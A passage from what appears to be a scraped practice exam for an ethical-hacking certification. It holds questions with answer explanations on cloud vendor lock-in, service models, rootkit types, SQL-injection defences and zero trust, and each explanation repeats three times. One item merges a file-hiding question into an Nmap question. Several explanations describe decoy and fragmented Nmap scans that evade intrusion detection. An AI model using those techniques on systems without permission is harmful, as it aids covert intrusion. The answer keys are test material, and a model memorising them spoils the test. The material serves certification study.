reconfiguration of this application to run natively on another provider can be an extremely expensive and difficult process. For instance, lets say youve developed a business intelligence platform on Microsoft Azure. You leverage basic cloud services like compute, storage, databases, and networking. But the app also includes Azures machine learning, data lake analytics, and bot services. Can you imagine all the changes youll have to make to your application if you had to move this to another CSP? One reason for this difficulty is a lack of standard interfaces and open APIs. Every CSP has their own proprietary specifications and standards, which make it very tough to move from one to another. Another reason is that technology and customer needs change so rapidly. You know first hand that your customers and partners continuously demand changes and improvements to your product. The faster that you add and edit features of your cloud-native application, the deeper entrenched you get with your CSP, and the tougher it will be to move to another cloud vendor. Infrastructure transfer risk Every major CSP does things a little bit differently. Virtual machine formats and their associated pricing vary from vendor to vendor, making it difficult to ensure that you have the appropriate resource usage and cost savings if you switch providers. Database offerings and formats may differ as well. And one cloud provider may have more attractive offerings in certain infrastructure components, while lacking in other services that you may need. These differences in the underlying infrastructure result in difficulties moving from one cloud service provider to another. Human resource knowledge risk If youve been working with a single CSP, your IT team has likely gained a lot of institutional knowledge about that providers tools and configurations. If you have to move your applications to another CSP, it will take time for your engineers to ramp up their knowledge of the new cloud platform. Theyll have to learn about new infrastructure formats, implementation processes, and more. Additionally, any newly required certifications will take a long time to earn. The knowledge risk is a factor that isnt often thought about, but is just as important as the risks highlighted above.
Unattempted
https://jaychapel.medium.com/how-much-should-enterprises-worry-about-vendor-lock-in-in-public-cloud-5029bf40fffa The vendor lock-in problem in cloud computing is the situation where customers are dependent (i.e. locked-in) on a single cloud service provider (CSP) technology implementation and cannot easily move to a different vendor without substantial costs or technical incompatibilities. Types of vendor lock-in risks The issue with vendor lock-in is the difficulty in moving to another cloud service provider if something goes awry. You hope that this never has to happen, but its a possibility. There are four primary lock-in risks that youll take working with a single cloud provider. These include: 1. Data transfer risk 2. Application transfer risk 3. Infrastructure transfer risk 4. Human resource knowledge risk Data transfer risk It is not easy to move your data from one CSP to another. A myriad of questions will arise during a data migration process, such as: 1. Who is responsible for extracting the data from the cloud databases and data warehouses? 2. In what format will the data be? Will that format work with the new cloud provider, or will significant changes need to be made to the data? 3. How can the data be transferred without loss of application functionality? 4. How long will it take and how much will it cost to move all of this data? While some industry groups have tried to create standards for data interchange, sometimes its difficult for companies to implement them due to their unique business requirements. Application transfer risk If you build an application on one CSP that leverages many of its offerings, the reconfiguration of this application to run natively on another provider can be an extremely expensive and difficult process. For instance, lets say youve developed a business intelligence platform on Microsoft Azure. You leverage basic cloud services like compute, storage, databases, and networking. But the app also includes Azures machine learning, data lake analytics, and bot services. Can you imagine all the changes youll have to make to your application if you had to move this to another CSP? One reason for this difficulty is a lack of standard interfaces and open APIs. Every CSP has their own proprietary specifications and standards, which make it very tough to move from one to another. Another reason is that technology and customer needs change so rapidly. You know first hand that your customers and partners continuously demand changes and improvements to your product. The faster that you add and edit features of your cloud-native application, the deeper entrenched you get with your CSP, and the tougher it will be to move to another cloud vendor. Infrastructure transfer risk Every major CSP does things a little bit differently. Virtual machine formats and their associated pricing vary from vendor to vendor, making it difficult to ensure that you have the appropriate resource usage and cost savings if you switch providers. Database offerings and formats may differ as well. And one cloud provider may have more attractive offerings in certain infrastructure components, while lacking in other services that you may need. These differences in the underlying infrastructure result in difficulties moving from one cloud service provider to another. Human resource knowledge risk If youve been working with a single CSP, your IT team has likely gained a lot of institutional knowledge about that providers tools and configurations. If you have to move your applications to another CSP, it will take time for your engineers to ramp up their knowledge of the new cloud platform. Theyll have to learn about new infrastructure formats, implementation processes, and more. Additionally, any newly required certifications will take a long time to earn. The knowledge risk is a factor that isnt often thought about, but is just as important as the risks highlighted above.
Question 48 of 65
48. Question
In which of the following cloud service models do you take full responsibility for the maintenance of the cloud-based resources?
Correct
https://www.intel.ru/content/www/ru/ru/cloud-computing/as-a-service.html IaaS (Infrastructure as a service) IaaS is on-demand access to cloud-hosted computing infrastructure – servers, storage capacity, and networking resources – that customers can provision, configure and use in much the same way as they use on-premises hardware. The difference is that the cloud service provider hosts manages and maintains the hardware and computing resources in its own data centers. IaaS customers use the hardware via an internet connection and pay for that use on a subscription or pay-as-you-go basis. PaaS (Platform as a service) PaaS provides a cloud-based platform for developing, running, managing applications. The cloud services provider hosts, manages and maintains all the hardware and software included in the platform – servers (for development, testing and deployment), operating system (OS) software, storage, networking, databases, middleware, runtimes, frameworks, development tools – as well as related services for security, operating system and software upgrades, backups and more. SaaS (Software as a service) SaaS is cloud-hosted, ready-to-use application software. Users pay a monthly or annual fee to use a complete application from within a web browser, desktop client, or mobile app. The application and all of the infrastructure required to deliver it – servers, storage, networking, middleware, application software, data storage – are hosted and managed by the SaaS vendor. BaaS (Backend as a Service) BaaS takes care of all the backend services of an application, and the developers can focus only on writing and maintaining the frontend side of the application. It provides backend services like database management, user authentication, cloud storage, hosting on the cloud, push notifications, etc.
Incorrect
https://www.intel.ru/content/www/ru/ru/cloud-computing/as-a-service.html IaaS (Infrastructure as a service) IaaS is on-demand access to cloud-hosted computing infrastructure – servers, storage capacity, and networking resources – that customers can provision, configure and use in much the same way as they use on-premises hardware. The difference is that the cloud service provider hosts manages and maintains the hardware and computing resources in its own data centers. IaaS customers use the hardware via an internet connection and pay for that use on a subscription or pay-as-you-go basis. PaaS (Platform as a service) PaaS provides a cloud-based platform for developing, running, managing applications. The cloud services provider hosts, manages and maintains all the hardware and software included in the platform – servers (for development, testing and deployment), operating system (OS) software, storage, networking, databases, middleware, runtimes, frameworks, development tools – as well as related services for security, operating system and software upgrades, backups and more. SaaS (Software as a service) SaaS is cloud-hosted, ready-to-use application software. Users pay a monthly or annual fee to use a complete application from within a web browser, desktop client, or mobile app. The application and all of the infrastructure required to deliver it – servers, storage, networking, middleware, application software, data storage – are hosted and managed by the SaaS vendor. BaaS (Backend as a Service) BaaS takes care of all the backend services of an application, and the developers can focus only on writing and maintaining the frontend side of the application. It provides backend services like database management, user authentication, cloud storage, hosting on the cloud, push notifications, etc.
Unattempted
https://www.intel.ru/content/www/ru/ru/cloud-computing/as-a-service.html IaaS (Infrastructure as a service) IaaS is on-demand access to cloud-hosted computing infrastructure – servers, storage capacity, and networking resources – that customers can provision, configure and use in much the same way as they use on-premises hardware. The difference is that the cloud service provider hosts manages and maintains the hardware and computing resources in its own data centers. IaaS customers use the hardware via an internet connection and pay for that use on a subscription or pay-as-you-go basis. PaaS (Platform as a service) PaaS provides a cloud-based platform for developing, running, managing applications. The cloud services provider hosts, manages and maintains all the hardware and software included in the platform – servers (for development, testing and deployment), operating system (OS) software, storage, networking, databases, middleware, runtimes, frameworks, development tools – as well as related services for security, operating system and software upgrades, backups and more. SaaS (Software as a service) SaaS is cloud-hosted, ready-to-use application software. Users pay a monthly or annual fee to use a complete application from within a web browser, desktop client, or mobile app. The application and all of the infrastructure required to deliver it – servers, storage, networking, middleware, application software, data storage – are hosted and managed by the SaaS vendor. BaaS (Backend as a Service) BaaS takes care of all the backend services of an application, and the developers can focus only on writing and maintaining the frontend side of the application. It provides backend services like database management, user authentication, cloud storage, hosting on the cloud, push notifications, etc.
Question 49 of 65
49. Question
You need to hide the file in the Linux system. Which of the following characters will you type at the beginning of the filename?
Alex received an order to conduct a pentest and scan a specific server. When receiving the technical task, he noticed the point: “The attacker must scan every port on the server several times using a set of spoofed source IP addresses.“ Which of the following Nmap flags will allow Alex to fulfill this requirement?
Correct
https://linux.die.net/man/1/nmap -D decoy1[,decoy2][,ME][,…] (Cloak a scan with decoys). Causes a decoy scan to be performed, which makes it appear to the remote host that the host(s) you specify as decoys are scanning the target network too. Thus their IDS might report 5-10 port scans from unique IP addresses, but they won‘t know which IP was scanning them and which were innocent decoys. While this can be defeated through router path tracing, response-dropping, and other active mechanisms, it is generally an effective technique for hiding your IP address. Separate each decoy host with commas, and you can optionally use ME. as one of the decoys to represent the position for your real IP address. If you put ME in the sixth position or later, some common port scan detectors (such as Solar Designer‘s. excellent Scanlogd). are unlikely to show your IP address at all. If you don‘t use ME, Nmap will put you in a random position. You can also use RND. to generate a random, non-reserved IP address, or RND:number to generate number addresses. Incorrect answers: -f (fragment packets); –mtu (using the specified MTU). The -f option causes the requested scan (including ping scans) to use tiny fragmented IP packets. The idea is to split up the TCP header over several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny packets. The old-school sniffer named Sniffit segmentation faulted immediately upon receiving the first fragment. Specify this option once, and Nmap splits the packets into eight bytes or less after the IP header. So a 20-byte TCP header would be split into three packets. Two with eight bytes of the TCP header, and one with the final four. Of course each fragment also has an IP header. Specify -f again to use 16 bytes per fragment (reducing the number of fragments). -S IP_Address (Spoof source address). In some circumstances, Nmap may not be able to determine your source address (Nmap will tell you if this is the case). In this situation, use -S with the IP address of the interface you wish to send packets through. -A (Aggressive scan options). This option enables additional advanced and aggressive options. I haven‘t decided exactly which it stands for yet. Presently this enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute).. More features may be added in the future. The point is to enable a comprehensive set of scan options without people having to remember a large set of flags. However, because script scanning with the default set is considered intrusive, you should not use -A against target networks without permission. This option only enables features, and not timing options (such as -T4) or verbosity options (-v) that you might want as well.
Incorrect
https://linux.die.net/man/1/nmap -D decoy1[,decoy2][,ME][,…] (Cloak a scan with decoys). Causes a decoy scan to be performed, which makes it appear to the remote host that the host(s) you specify as decoys are scanning the target network too. Thus their IDS might report 5-10 port scans from unique IP addresses, but they won‘t know which IP was scanning them and which were innocent decoys. While this can be defeated through router path tracing, response-dropping, and other active mechanisms, it is generally an effective technique for hiding your IP address. Separate each decoy host with commas, and you can optionally use ME. as one of the decoys to represent the position for your real IP address. If you put ME in the sixth position or later, some common port scan detectors (such as Solar Designer‘s. excellent Scanlogd). are unlikely to show your IP address at all. If you don‘t use ME, Nmap will put you in a random position. You can also use RND. to generate a random, non-reserved IP address, or RND:number to generate number addresses. Incorrect answers: -f (fragment packets); –mtu (using the specified MTU). The -f option causes the requested scan (including ping scans) to use tiny fragmented IP packets. The idea is to split up the TCP header over several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny packets. The old-school sniffer named Sniffit segmentation faulted immediately upon receiving the first fragment. Specify this option once, and Nmap splits the packets into eight bytes or less after the IP header. So a 20-byte TCP header would be split into three packets. Two with eight bytes of the TCP header, and one with the final four. Of course each fragment also has an IP header. Specify -f again to use 16 bytes per fragment (reducing the number of fragments). -S IP_Address (Spoof source address). In some circumstances, Nmap may not be able to determine your source address (Nmap will tell you if this is the case). In this situation, use -S with the IP address of the interface you wish to send packets through. -A (Aggressive scan options). This option enables additional advanced and aggressive options. I haven‘t decided exactly which it stands for yet. Presently this enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute).. More features may be added in the future. The point is to enable a comprehensive set of scan options without people having to remember a large set of flags. However, because script scanning with the default set is considered intrusive, you should not use -A against target networks without permission. This option only enables features, and not timing options (such as -T4) or verbosity options (-v) that you might want as well.
Unattempted
https://linux.die.net/man/1/nmap -D decoy1[,decoy2][,ME][,…] (Cloak a scan with decoys). Causes a decoy scan to be performed, which makes it appear to the remote host that the host(s) you specify as decoys are scanning the target network too. Thus their IDS might report 5-10 port scans from unique IP addresses, but they won‘t know which IP was scanning them and which were innocent decoys. While this can be defeated through router path tracing, response-dropping, and other active mechanisms, it is generally an effective technique for hiding your IP address. Separate each decoy host with commas, and you can optionally use ME. as one of the decoys to represent the position for your real IP address. If you put ME in the sixth position or later, some common port scan detectors (such as Solar Designer‘s. excellent Scanlogd). are unlikely to show your IP address at all. If you don‘t use ME, Nmap will put you in a random position. You can also use RND. to generate a random, non-reserved IP address, or RND:number to generate number addresses. Incorrect answers: -f (fragment packets); –mtu (using the specified MTU). The -f option causes the requested scan (including ping scans) to use tiny fragmented IP packets. The idea is to split up the TCP header over several packets to make it harder for packet filters, intrusion detection systems, and other annoyances to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny packets. The old-school sniffer named Sniffit segmentation faulted immediately upon receiving the first fragment. Specify this option once, and Nmap splits the packets into eight bytes or less after the IP header. So a 20-byte TCP header would be split into three packets. Two with eight bytes of the TCP header, and one with the final four. Of course each fragment also has an IP header. Specify -f again to use 16 bytes per fragment (reducing the number of fragments). -S IP_Address (Spoof source address). In some circumstances, Nmap may not be able to determine your source address (Nmap will tell you if this is the case). In this situation, use -S with the IP address of the interface you wish to send packets through. -A (Aggressive scan options). This option enables additional advanced and aggressive options. I haven‘t decided exactly which it stands for yet. Presently this enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute).. More features may be added in the future. The point is to enable a comprehensive set of scan options without people having to remember a large set of flags. However, because script scanning with the default set is considered intrusive, you should not use -A against target networks without permission. This option only enables features, and not timing options (such as -T4) or verbosity options (-v) that you might want as well.
Question 51 of 65
51. Question
Which of the following is a rootkit that adds additional code or replaces portions of the core operating system to obscure a backdoor on a system?
Correct
https://en.wikipedia.org/wiki/Rootkit Kernel-Level rootkit: Kernel is the core of the Operating System and Kernel Level Rootkits are created by adding additional code or replacing portions of the core operating system, with modified code via device drivers (in Windows) or Loadable Kernel Modules (Linux). Kernel Level Rootkits can have a serious effect on the stability of the system if the kits code contains bugs. Kernel rootkits are difficult to detect because they have the same privileges of the Operating System, and therefore they can intercept or subvert operating system operations. Incorrect answers: Application-level rootkit: Application-level rootkits operate inside the victim computer by changing standard application files with rootkit files, or changing the behaviour of present applications with patches, injected code etc. Hypervisor-Level rootkit: Hypervisor (Virtualized) Level Rootkits are created by exploiting hardware features such as Intel VT or AMD-V (Hardware-assisted virtualization technologies). Hypervisor level rootkits hosts the target operating system as a virtual machine and therefore they can intercept all hardware calls made by the target operating system. User-mode rootkit: User-mode rootkits run along with other applications as user, rather than low-level system processes. They have a number of possible installation vectors to intercept and modify the standard behavior of application programming interfaces (APIs). Some inject a dynamically linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target application.
Incorrect
https://en.wikipedia.org/wiki/Rootkit Kernel-Level rootkit: Kernel is the core of the Operating System and Kernel Level Rootkits are created by adding additional code or replacing portions of the core operating system, with modified code via device drivers (in Windows) or Loadable Kernel Modules (Linux). Kernel Level Rootkits can have a serious effect on the stability of the system if the kits code contains bugs. Kernel rootkits are difficult to detect because they have the same privileges of the Operating System, and therefore they can intercept or subvert operating system operations. Incorrect answers: Application-level rootkit: Application-level rootkits operate inside the victim computer by changing standard application files with rootkit files, or changing the behaviour of present applications with patches, injected code etc. Hypervisor-Level rootkit: Hypervisor (Virtualized) Level Rootkits are created by exploiting hardware features such as Intel VT or AMD-V (Hardware-assisted virtualization technologies). Hypervisor level rootkits hosts the target operating system as a virtual machine and therefore they can intercept all hardware calls made by the target operating system. User-mode rootkit: User-mode rootkits run along with other applications as user, rather than low-level system processes. They have a number of possible installation vectors to intercept and modify the standard behavior of application programming interfaces (APIs). Some inject a dynamically linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target application.
Unattempted
https://en.wikipedia.org/wiki/Rootkit Kernel-Level rootkit: Kernel is the core of the Operating System and Kernel Level Rootkits are created by adding additional code or replacing portions of the core operating system, with modified code via device drivers (in Windows) or Loadable Kernel Modules (Linux). Kernel Level Rootkits can have a serious effect on the stability of the system if the kits code contains bugs. Kernel rootkits are difficult to detect because they have the same privileges of the Operating System, and therefore they can intercept or subvert operating system operations. Incorrect answers: Application-level rootkit: Application-level rootkits operate inside the victim computer by changing standard application files with rootkit files, or changing the behaviour of present applications with patches, injected code etc. Hypervisor-Level rootkit: Hypervisor (Virtualized) Level Rootkits are created by exploiting hardware features such as Intel VT or AMD-V (Hardware-assisted virtualization technologies). Hypervisor level rootkits hosts the target operating system as a virtual machine and therefore they can intercept all hardware calls made by the target operating system. User-mode rootkit: User-mode rootkits run along with other applications as user, rather than low-level system processes. They have a number of possible installation vectors to intercept and modify the standard behavior of application programming interfaces (APIs). Some inject a dynamically linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target application.
Question 52 of 65
52. Question
Which antenna is commonly used in communications for a frequency band of 10 MHz to VHF and UHF?
Correct
https://en.wikipedia.org/wiki/Yagi%E2%80%93Uda_antenna A YagiUda antenna or simply Yagi antenna, is a directional antenna consisting of two or more parallel resonant antenna elements in an end-fire array; these elements are most often metal rods acting as half-wave dipoles. YagiUda antennas consist of a single driven element connected to a radio transmitter and/or receiver through a transmission line, and additional “parasitic elements“ with no electrical connection, usually including one so-called reflector and any number of directors. It was invented in 1926 by Shintaro Uda of Tohoku Imperial University, Japan, with a lesser role played by his colleague Hidetsugu Yagi. Reflector elements (usually only one is used) are slightly longer than the driven dipole and placed behind the driven element, opposite the direction of intended transmission. Directors, on the other hand, are a little shorter and placed in front of the driven element in the intended direction. These parasitic elements are typically off-tuned short-circuited dipole elements, that is, instead of a break at the feedpoint (like the driven element) a solid rod is used. They receive and reradiate the radio waves from the driven element but in a different phase determined by their exact lengths. Their effect is to modify the driven element‘s radiation pattern. The waves from the multiple elements superpose and interfere to enhance radiation in a single direction, increasing the antenna‘s gain in that direction. Also called a beam antenna and parasitic array, the Yagi is very widely used as a high-gain antenna on the HF, VHF and UHF bands. It has moderate to high gain depending on the number of elements present, sometimes reaching as high as 20 dBi, in a unidirectional beam pattern. As an end-fire array, it can achieve a front-to-back ratio of up to 20 dB. It retains the polarization common to its elements, usually linear polarization (its elements being half-wave dipoles). It is relatively lightweight, inexpensive and simple to construct.The bandwidth of a Yagi antenna, the frequency range over which it maintains its gain and feedpoint impedance, is narrow, just a few percent of the center frequency, decreasing for models with higher gain, making it ideal for fixed-frequency applications. The largest and best-known use is as rooftop terrestrial television antennas, but it is also used for point-to-point fixed communication links, in radar antennas, and for long distance shortwave communication by shortwave broadcasting stations and radio amateurs.
Incorrect
https://en.wikipedia.org/wiki/Yagi%E2%80%93Uda_antenna A YagiUda antenna or simply Yagi antenna, is a directional antenna consisting of two or more parallel resonant antenna elements in an end-fire array; these elements are most often metal rods acting as half-wave dipoles. YagiUda antennas consist of a single driven element connected to a radio transmitter and/or receiver through a transmission line, and additional “parasitic elements“ with no electrical connection, usually including one so-called reflector and any number of directors. It was invented in 1926 by Shintaro Uda of Tohoku Imperial University, Japan, with a lesser role played by his colleague Hidetsugu Yagi. Reflector elements (usually only one is used) are slightly longer than the driven dipole and placed behind the driven element, opposite the direction of intended transmission. Directors, on the other hand, are a little shorter and placed in front of the driven element in the intended direction. These parasitic elements are typically off-tuned short-circuited dipole elements, that is, instead of a break at the feedpoint (like the driven element) a solid rod is used. They receive and reradiate the radio waves from the driven element but in a different phase determined by their exact lengths. Their effect is to modify the driven element‘s radiation pattern. The waves from the multiple elements superpose and interfere to enhance radiation in a single direction, increasing the antenna‘s gain in that direction. Also called a beam antenna and parasitic array, the Yagi is very widely used as a high-gain antenna on the HF, VHF and UHF bands. It has moderate to high gain depending on the number of elements present, sometimes reaching as high as 20 dBi, in a unidirectional beam pattern. As an end-fire array, it can achieve a front-to-back ratio of up to 20 dB. It retains the polarization common to its elements, usually linear polarization (its elements being half-wave dipoles). It is relatively lightweight, inexpensive and simple to construct.The bandwidth of a Yagi antenna, the frequency range over which it maintains its gain and feedpoint impedance, is narrow, just a few percent of the center frequency, decreasing for models with higher gain, making it ideal for fixed-frequency applications. The largest and best-known use is as rooftop terrestrial television antennas, but it is also used for point-to-point fixed communication links, in radar antennas, and for long distance shortwave communication by shortwave broadcasting stations and radio amateurs.
Unattempted
https://en.wikipedia.org/wiki/Yagi%E2%80%93Uda_antenna A YagiUda antenna or simply Yagi antenna, is a directional antenna consisting of two or more parallel resonant antenna elements in an end-fire array; these elements are most often metal rods acting as half-wave dipoles. YagiUda antennas consist of a single driven element connected to a radio transmitter and/or receiver through a transmission line, and additional “parasitic elements“ with no electrical connection, usually including one so-called reflector and any number of directors. It was invented in 1926 by Shintaro Uda of Tohoku Imperial University, Japan, with a lesser role played by his colleague Hidetsugu Yagi. Reflector elements (usually only one is used) are slightly longer than the driven dipole and placed behind the driven element, opposite the direction of intended transmission. Directors, on the other hand, are a little shorter and placed in front of the driven element in the intended direction. These parasitic elements are typically off-tuned short-circuited dipole elements, that is, instead of a break at the feedpoint (like the driven element) a solid rod is used. They receive and reradiate the radio waves from the driven element but in a different phase determined by their exact lengths. Their effect is to modify the driven element‘s radiation pattern. The waves from the multiple elements superpose and interfere to enhance radiation in a single direction, increasing the antenna‘s gain in that direction. Also called a beam antenna and parasitic array, the Yagi is very widely used as a high-gain antenna on the HF, VHF and UHF bands. It has moderate to high gain depending on the number of elements present, sometimes reaching as high as 20 dBi, in a unidirectional beam pattern. As an end-fire array, it can achieve a front-to-back ratio of up to 20 dB. It retains the polarization common to its elements, usually linear polarization (its elements being half-wave dipoles). It is relatively lightweight, inexpensive and simple to construct.The bandwidth of a Yagi antenna, the frequency range over which it maintains its gain and feedpoint impedance, is narrow, just a few percent of the center frequency, decreasing for models with higher gain, making it ideal for fixed-frequency applications. The largest and best-known use is as rooftop terrestrial television antennas, but it is also used for point-to-point fixed communication links, in radar antennas, and for long distance shortwave communication by shortwave broadcasting stations and radio amateurs.
Question 53 of 65
53. Question
You want to prevent possible SQLi attacks on your site. To do this, you decide to use a practice whereby only a list of entities such as the data type, range, size, and value, which have been approved for secured access, is accepted. Which of the following practices are you going to adopt?
Correct
According to EC-council courseware: Whitelist validation Whitelist validation is a best practice whereby only the list of entities (i.e., data type, range, size, value, etc.) that have been approved for secured access is accepted. Whitelist validation can also be termed as positive validation or inclusion. Blacklist Validation Blacklist validation rejects all malicious inputs that have been disapproved for protected access. Blacklist validation can be challenging as every content and character of the attack should be interpreted, understood, and anticipated for future attacks as well. Blacklist validation can also be termed as negative validation or exclusion. Output Encoding Output encoding is a validation technique that can be used after input validation. This technique is used to encode the input to ensure that it is properly sanitized before passing it to the database. Enforcing Least Privileges Enforcing least privileges is a security best practice whereby the lowest level of privileges is assigned to every account accessing the database. It is recommended not to assign DBA level and administrator-level access rights to the application. In some critical situations, some applications may require elevated access rights; hence, proper groundwork should be done by the security professionals and they should also figure out the exact requirements of the application.
Incorrect
According to EC-council courseware: Whitelist validation Whitelist validation is a best practice whereby only the list of entities (i.e., data type, range, size, value, etc.) that have been approved for secured access is accepted. Whitelist validation can also be termed as positive validation or inclusion. Blacklist Validation Blacklist validation rejects all malicious inputs that have been disapproved for protected access. Blacklist validation can be challenging as every content and character of the attack should be interpreted, understood, and anticipated for future attacks as well. Blacklist validation can also be termed as negative validation or exclusion. Output Encoding Output encoding is a validation technique that can be used after input validation. This technique is used to encode the input to ensure that it is properly sanitized before passing it to the database. Enforcing Least Privileges Enforcing least privileges is a security best practice whereby the lowest level of privileges is assigned to every account accessing the database. It is recommended not to assign DBA level and administrator-level access rights to the application. In some critical situations, some applications may require elevated access rights; hence, proper groundwork should be done by the security professionals and they should also figure out the exact requirements of the application.
Unattempted
According to EC-council courseware: Whitelist validation Whitelist validation is a best practice whereby only the list of entities (i.e., data type, range, size, value, etc.) that have been approved for secured access is accepted. Whitelist validation can also be termed as positive validation or inclusion. Blacklist Validation Blacklist validation rejects all malicious inputs that have been disapproved for protected access. Blacklist validation can be challenging as every content and character of the attack should be interpreted, understood, and anticipated for future attacks as well. Blacklist validation can also be termed as negative validation or exclusion. Output Encoding Output encoding is a validation technique that can be used after input validation. This technique is used to encode the input to ensure that it is properly sanitized before passing it to the database. Enforcing Least Privileges Enforcing least privileges is a security best practice whereby the lowest level of privileges is assigned to every account accessing the database. It is recommended not to assign DBA level and administrator-level access rights to the application. In some critical situations, some applications may require elevated access rights; hence, proper groundwork should be done by the security professionals and they should also figure out the exact requirements of the application.
Question 54 of 65
54. Question
Which of the following tools is an automated tool that eases his work and performs vulnerability scanning to find hosts, services, and other vulnerabilities in the target server?
Correct
https://www.netsparker.com/support/what-is-netsparker/ Netsparker is an automated, yet fully configurable, web application security scanner that enables you to scan websites, web applications, and web services, and identify security flaws. Netsparker can scan all types of web applications, regardless of the platform or the language with which they are built. Netsparker is the only online web application security scanner that automatically exploits identified vulnerabilities in a read-only and safe way, in order to confirm identified issues. It also presents proof of the vulnerability so that you do not need to waste time manually verifying it. For example, in the case of a detected SQL injection vulnerability, it will show the database name as the proof of exploit. Incorrect answers: Infoga https://github.com/m4ll0k/Infoga Infoga is a tool gathering email accounts informations (ip,hostname,country,…) from different public source (search engines, pgp key servers and shodan) and check if emails was leaked using haveibeenpwned.com API. NCollector Studio NCollector Studio is an all in one offline browser, website ripper/crawler aimed at home users and professionals needing to download specific files from a website or full websites for offline browsing. WebCopier Pro WebCopier Pro allows saving complete copies of your favorite sites, magazines, or stock quotes. Companies can transfer their intranet contents to staff computers, create a copy of companies‘ online catalogs and brochures for sales personal, backup corporate web sites, print downloaded files.
Incorrect
https://www.netsparker.com/support/what-is-netsparker/ Netsparker is an automated, yet fully configurable, web application security scanner that enables you to scan websites, web applications, and web services, and identify security flaws. Netsparker can scan all types of web applications, regardless of the platform or the language with which they are built. Netsparker is the only online web application security scanner that automatically exploits identified vulnerabilities in a read-only and safe way, in order to confirm identified issues. It also presents proof of the vulnerability so that you do not need to waste time manually verifying it. For example, in the case of a detected SQL injection vulnerability, it will show the database name as the proof of exploit. Incorrect answers: Infoga https://github.com/m4ll0k/Infoga Infoga is a tool gathering email accounts informations (ip,hostname,country,…) from different public source (search engines, pgp key servers and shodan) and check if emails was leaked using haveibeenpwned.com API. NCollector Studio NCollector Studio is an all in one offline browser, website ripper/crawler aimed at home users and professionals needing to download specific files from a website or full websites for offline browsing. WebCopier Pro WebCopier Pro allows saving complete copies of your favorite sites, magazines, or stock quotes. Companies can transfer their intranet contents to staff computers, create a copy of companies‘ online catalogs and brochures for sales personal, backup corporate web sites, print downloaded files.
Unattempted
https://www.netsparker.com/support/what-is-netsparker/ Netsparker is an automated, yet fully configurable, web application security scanner that enables you to scan websites, web applications, and web services, and identify security flaws. Netsparker can scan all types of web applications, regardless of the platform or the language with which they are built. Netsparker is the only online web application security scanner that automatically exploits identified vulnerabilities in a read-only and safe way, in order to confirm identified issues. It also presents proof of the vulnerability so that you do not need to waste time manually verifying it. For example, in the case of a detected SQL injection vulnerability, it will show the database name as the proof of exploit. Incorrect answers: Infoga https://github.com/m4ll0k/Infoga Infoga is a tool gathering email accounts informations (ip,hostname,country,…) from different public source (search engines, pgp key servers and shodan) and check if emails was leaked using haveibeenpwned.com API. NCollector Studio NCollector Studio is an all in one offline browser, website ripper/crawler aimed at home users and professionals needing to download specific files from a website or full websites for offline browsing. WebCopier Pro WebCopier Pro allows saving complete copies of your favorite sites, magazines, or stock quotes. Companies can transfer their intranet contents to staff computers, create a copy of companies‘ online catalogs and brochures for sales personal, backup corporate web sites, print downloaded files.
Question 55 of 65
55. Question
Identify technique for securing the cloud resources according to describe below: This technique assumes by default that a user attempting to access the network is not an authentic entity and verifies every incoming connection before allowing access to the network. When using this technique imposed conditions such that employees can access only the resources required for their role.
Correct
https://en.wikipedia.org/wiki/Zero_trust_security_model Zero Trust Network Access (ZTNA) is a category of technologies that provides secure remote access to applications and services based on defined access control policies. Unlike VPNs, which grant complete access to a LAN, ZTNA solutions default to deny, providing only the access to services the user has been explicitly granted. Incorrect answers: DMZ https://en.wikipedia.org/wiki/DMZ_(computing) DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization‘s external-facing services to an untrusted, usually larger, network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization‘s local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization‘s network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network. Serverless computing https://en.wikipedia.org/wiki/Serverless_computing Serverless computing is a cloud computing execution model in which the cloud provider allocates machine resources on demand, taking care of the servers on behalf of their customers. Serverless computing does not hold resources in volatile memory; computing is rather done in short bursts with the results persisted to storage. When an app is not in use, there are no computing resources allocated to the app. Pricing is based on the actual amount of resources consumed by an application. It can be a form of utility computing. “Serverless“ is a misnomer in the sense that servers are still used by cloud service providers to execute code for developers. Container technology Container technology, also simply known as just a container, is a method to package an application so it can be run, with its dependencies, isolated from other processes. The major public cloud computing providers, including Amazon Web Services, Microsoft Azure and Google Cloud Platform have embraced container technology, with container software having names including the popular choices of Docker, Apache Mesos, rkt (pronounced rocket), and Kubernetes.
Incorrect
https://en.wikipedia.org/wiki/Zero_trust_security_model Zero Trust Network Access (ZTNA) is a category of technologies that provides secure remote access to applications and services based on defined access control policies. Unlike VPNs, which grant complete access to a LAN, ZTNA solutions default to deny, providing only the access to services the user has been explicitly granted. Incorrect answers: DMZ https://en.wikipedia.org/wiki/DMZ_(computing) DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization‘s external-facing services to an untrusted, usually larger, network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization‘s local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization‘s network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network. Serverless computing https://en.wikipedia.org/wiki/Serverless_computing Serverless computing is a cloud computing execution model in which the cloud provider allocates machine resources on demand, taking care of the servers on behalf of their customers. Serverless computing does not hold resources in volatile memory; computing is rather done in short bursts with the results persisted to storage. When an app is not in use, there are no computing resources allocated to the app. Pricing is based on the actual amount of resources consumed by an application. It can be a form of utility computing. “Serverless“ is a misnomer in the sense that servers are still used by cloud service providers to execute code for developers. Container technology Container technology, also simply known as just a container, is a method to package an application so it can be run, with its dependencies, isolated from other processes. The major public cloud computing 